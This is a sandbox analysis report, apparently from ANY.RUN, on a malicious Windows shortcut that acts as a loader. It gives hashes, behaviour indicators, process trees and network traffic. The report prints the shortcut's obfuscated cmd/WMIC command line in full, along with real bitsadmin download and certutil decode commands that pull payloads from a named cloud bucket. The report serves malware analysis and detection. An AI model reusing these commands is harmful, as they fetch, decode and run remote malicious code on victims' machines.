File name:

Comprovante_Zattini.390.lnk

Full analysis: https://app.any.run/tasks/90b3e40b-f5cf-4b08-872b-14165186619c
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 24, 2019, 14:06:35
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
apt
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has command line arguments, Icon number=23, Archive, ctime=Sun Nov 21 02:24:03 2010, mtime=Sun Nov 21 02:24:03 2010, atime=Sun Nov 21 02:24:03 2010, length=302592, window=hidenormalshowminimized
MD5:

A48A820F22CEB01A84A7E873ECC227DD

SHA1:

86D8F3471AC1EB51C2C2671E75EBBEB7AFF72ACB

SHA256:

018C35D81207FA01DBC486E4294AE3B5AAD6F5B74ABBC2D25E9D25D0FB1131F9

SSDEEP:

48:8Ar11n9SAA446446EATYYjPi5w+K+IKYj5KcQzqG3DzvKr4Jo/x4OZaTGHK5:8w19It6tA7Hb3KY9KnbvKsJgOGgGq5

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Runs app for hidden code execution

      • cmd.exe (PID: 2988)
    • Uses BITADMIN.EXE for downloading application

      • WMIC.exe (PID: 2212)
    • Registers / Runs the DLL via REGSVR32.EXE

      • WMIC.exe (PID: 2212)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2988)
      • WMIC.exe (PID: 2212)
    • Executable content was dropped or overwritten

      • certutil.exe (PID: 2952)
      • certutil.exe (PID: 3104)
    • Application launched itself

      • WMIC.exe (PID: 1944)
    • Starts CertUtil for decode files

      • WMIC.exe (PID: 2212)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, LinkInfo, Description, CommandArgs, IconFile, Unicode, ExpString
FileAttributes: Archive
CreateDate: 2010:11:21 04:24:03+01:00
AccessDate: 2010:11:21 04:24:03+01:00
ModifyDate: 2010:11:21 04:24:03+01:00
TargetFileSize: 302592
IconIndex: 23
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: cmd.exe
DriveType: Fixed Disk
VolumeLabel: -
LocalBasePath: C:\Windows\System32\cmd.exe
Description: bmcxrs46lee90WYFrmxmes48iu30hWYFixxmudf7iqk4hOLFixvmef78iq26hELqicmved57iq26aELKcmvvhj57ge86dILKncbrhj67ue9dUUIJncxih466le90dY
CommandLineArguments: /start /MIN %ComSpec% start /MIN %ComSpec% /V /C "set x=Cusf6:usf6\usf6\usf6Wusf6iusf6ndusf6owusf6s\usf6\susf6ysusf6tusf6eusf6musf63usf62usf6\usf6\usf6wusf6busf6eusf6m\usf6\Wusf6Musf6Iusf6C.eusf6xusf6e ousf6s gusf6eusf6t fusf65usf67usf6iusf6tusf66usf6husf6Eusf6Susf6, 6usf67usf6husf6iusf62usf66usf6ausf6, nusf6uusf6musf6busf6eusf6rusf6ousf6fusf6uusf6susf6eusf6rusf6susf6 /usf6fousf6rmusf6at:"husf6tusf6tusf6pusf6:usf6/usf6/susf6tusf6ousf6rusf6ausf6gusf6eusf6.usf6gusf6ousf6ousf6gusf6lusf6eusf6ausf6pusf6iusf6susf6.usf6cusf6ousf6musf6/usf6musf6iusf6dusf6gusf6ousf6lusf6dusf6eusf6musf6/usf60usf69usf6/usf6vusf6.usf6tusf6xusf6tusf6#usf60usf62usf65usf60usf64usf60usf6xusf6iusf6uusf6jusf66usf6rusf6lusf69usf6dusf6" &&echo %x:usf6=%|%ComSpec%"
IconFileName: %SystemRoot%\system32\imageres.dll
MachineID: dedicado-web
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
90
Monitored processes
31
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs cmd.exe no specs cmd.exe no specs wmic.exe wmic.exe bitsadmin.exe no specs certutil.exe no specs bitsadmin.exe no specs certutil.exe no specs bitsadmin.exe no specs certutil.exe no specs bitsadmin.exe no specs certutil.exe no specs bitsadmin.exe no specs certutil.exe no specs bitsadmin.exe no specs certutil.exe no specs bitsadmin.exe no specs certutil.exe no specs bitsadmin.exe no specs certutil.exe bitsadmin.exe no specs certutil.exe no specs cmd.exe no specs bitsadmin.exe no specs certutil.exe bitsadmin.exe no specs certutil.exe no specs regsvr32.exe no specs cmd.exe no specs timeout.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1944C:\\Windows\\system32\\wbem\\WMIC.exe os get f57it6hES, 67hi26a, numberofusers /format:"http://storage.googleapis.com/midgoldem/09/v.txt#025040xiuj6rl9d" C:\Windows\system32\wbem\WMIC.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
2147749911
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
2212"C:\Windows\System32\wbem\WMIC.exe" os get AXFWSIIT, XCSBXQWM, QHIMBSHY, lastbootupdate /format:"http://storage.googleapis.com/midgoldem/09/vv.txt#9961769"C:\Windows\System32\wbem\WMIC.exe
WMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
2304"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://storage.googleapis.com/midgoldem/x/09/falxconxrenwc.jpg.zip.log?719961896 C:\Users\Public\Libraries\temporary\falxconxrenwc.jpg.zC:\Windows\System32\bitsadmin.exeWMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
2356"C:\Windows\System32\certutil.exe" -decode C:\Users\Public\Libraries\temporary\falxconxrenwgx.gif.z C:\Users\Public\Libraries\temporary\falxconxrenwgx.gifC:\Windows\System32\certutil.exeWMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\certutil.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\certcli.dll
c:\windows\system32\atl.dll
2428"C:\Windows\System32\certutil.exe" -decode C:\Users\Public\Libraries\temporary\falxconxrenwdwwn.gif.z C:\Users\Public\Libraries\temporary\falxconxrenwdwwn.gifC:\Windows\System32\certutil.exeWMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\certutil.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\certcli.dll
c:\windows\system32\atl.dll
2448"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://storage.googleapis.com/midgoldem/x/09/falxconxrenwxb.gif.zip.log?889752831 C:\Users\Public\Libraries\temporary\falxconxrenwxb.~.zC:\Windows\System32\bitsadmin.exeWMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\ole32.dll
2604"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://storage.googleapis.com/midgoldem/x/09/falxconxrenwg.gif.zip.log?244653065 C:\Users\Public\Libraries\temporary\falxconxrenwg.gif.zC:\Windows\System32\bitsadmin.exeWMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
2680"C:\Windows\System32\certutil.exe" -decode C:\Users\Public\Libraries\temporary\falxconxrenwa.jpg.z C:\Users\Public\Libraries\temporary\falxconxrenwa.jpgC:\Windows\System32\certutil.exeWMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\certutil.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\certcli.dll
c:\windows\system32\atl.dll
2724"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://storage.googleapis.com/midgoldem/x/09/falxconxrenwhh11.dll.zip.log?160185165 C:\Users\Public\Libraries\temporary\falxconxrenw64.~.zC:\Windows\System32\bitsadmin.exeWMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
2792"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://storage.googleapis.com/midgoldem/x/09/falxconxrenwgx.gif.zip.log?113828321 C:\Users\Public\Libraries\temporary\falxconxrenwgx.gif.zC:\Windows\System32\bitsadmin.exeWMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
Total events
259
Read events
235
Write events
24
Delete events
0

Modification events

(PID) Process:(1944) WMIC.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(1944) WMIC.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(1944) WMIC.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(1944) WMIC.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
(PID) Process:(1944) WMIC.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(1944) WMIC.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(1944) WMIC.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(1944) WMIC.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(1944) WMIC.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASMANCS
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(1944) WMIC.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASMANCS
Operation:writeName:ConsoleTracingMask
Value:
4294901760
Executable files
2
Suspicious files
8
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
2212WMIC.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\vv[1].txtxml
MD5:
SHA256:
2680certutil.exeC:\Users\Public\Libraries\temporary\falxconxrenwa.jpgbinary
MD5:
SHA256:
3808certutil.exeC:\Users\Public\Libraries\temporary\falxconxrenwc.jpgbinary
MD5:
SHA256:
2356certutil.exeC:\Users\Public\Libraries\temporary\falxconxrenwgx.gifbinary
MD5:
SHA256:
2428certutil.exeC:\Users\Public\Libraries\temporary\falxconxrenwdwwn.gifbinary
MD5:
SHA256:
4072certutil.exeC:\Users\Public\Libraries\temporary\falxconxrenwdx.gifbinary
MD5:
SHA256:
3076cmd.exeC:\Users\Public\Libraries\temporary\r1.logtext
MD5:
SHA256:
2952certutil.exeC:\Users\Public\Libraries\temporary\falxconxrenwxa.~executable
MD5:
SHA256:
3208certutil.exeC:\Users\Public\Libraries\temporary\falxconxrenwb.jpgbinary
MD5:
SHA256:
2904certutil.exeC:\Users\Public\Libraries\temporary\falxconxrenwg.gifbinary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
24
TCP/UDP connections
3
DNS requests
1
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
172.217.18.16:80
http://storage.googleapis.com/midgoldem/x/09/falxconxrenwb.jpg.zip.log?622722882
US
text
247 Kb
whitelisted
HEAD
200
172.217.18.16:80
http://storage.googleapis.com/midgoldem/x/09/falxconxrenwg.gif.zip.log?244653065
US
text
1.19 Mb
whitelisted
HEAD
200
172.217.18.16:80
http://storage.googleapis.com/midgoldem/x/09/falxconxrenwa.jpg.zip.log?84824163
US
whitelisted
GET
200
172.217.18.16:80
http://storage.googleapis.com/midgoldem/x/09/falxconxrenwa.jpg.zip.log?84824163
US
text
68.6 Kb
whitelisted
GET
200
172.217.18.16:80
http://storage.googleapis.com/midgoldem/x/09/falxconxrenwdwwn.gif.zip.log?519675567
US
text
1.19 Mb
whitelisted
HEAD
200
172.217.18.16:80
http://storage.googleapis.com/midgoldem/x/09/falxconxrenwdx.gif.zip.log?217179177
US
text
1.19 Mb
whitelisted
GET
200
172.217.18.16:80
http://storage.googleapis.com/midgoldem/x/09/falxconxrenwgx.gif.zip.log?113828321
US
text
488 Kb
whitelisted
HEAD
200
172.217.18.16:80
http://storage.googleapis.com/midgoldem/x/09/falxconxrenwxa.gif.zip.log?375221081
US
text
488 Kb
whitelisted
GET
200
172.217.18.16:80
http://storage.googleapis.com/midgoldem/x/09/falxconxrenwdx.gif.zip.log?217179177
US
text
1.19 Mb
whitelisted
HEAD
200
172.217.18.16:80
http://storage.googleapis.com/midgoldem/x/09/falxconxrenwdwwn.gif.zip.log?519675567
US
text
308 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
172.217.18.16:80
storage.googleapis.com
Google Inc.
US
whitelisted
2212
WMIC.exe
172.217.18.16:80
storage.googleapis.com
Google Inc.
US
whitelisted
1944
WMIC.exe
172.217.18.16:80
storage.googleapis.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
storage.googleapis.com
  • 172.217.18.16
whitelisted

Threats

PID
Process
Class
Message
1944
WMIC.exe
A Network Trojan was detected
ET TROJAN HTML/Xbash Hex Encoded WScript.Shell Inbound - Stage 1
1944
WMIC.exe
Misc activity
SUSPICIOUS [PTsecurity] JS obfuscation (obfuscator.io)
2212
WMIC.exe
A Network Trojan was detected
ET TROJAN HTML/Xbash Hex Encoded WScript.Shell Inbound - Stage 1
2212
WMIC.exe
Misc activity
SUSPICIOUS [PTsecurity] JS obfuscation (obfuscator.io)
No debug info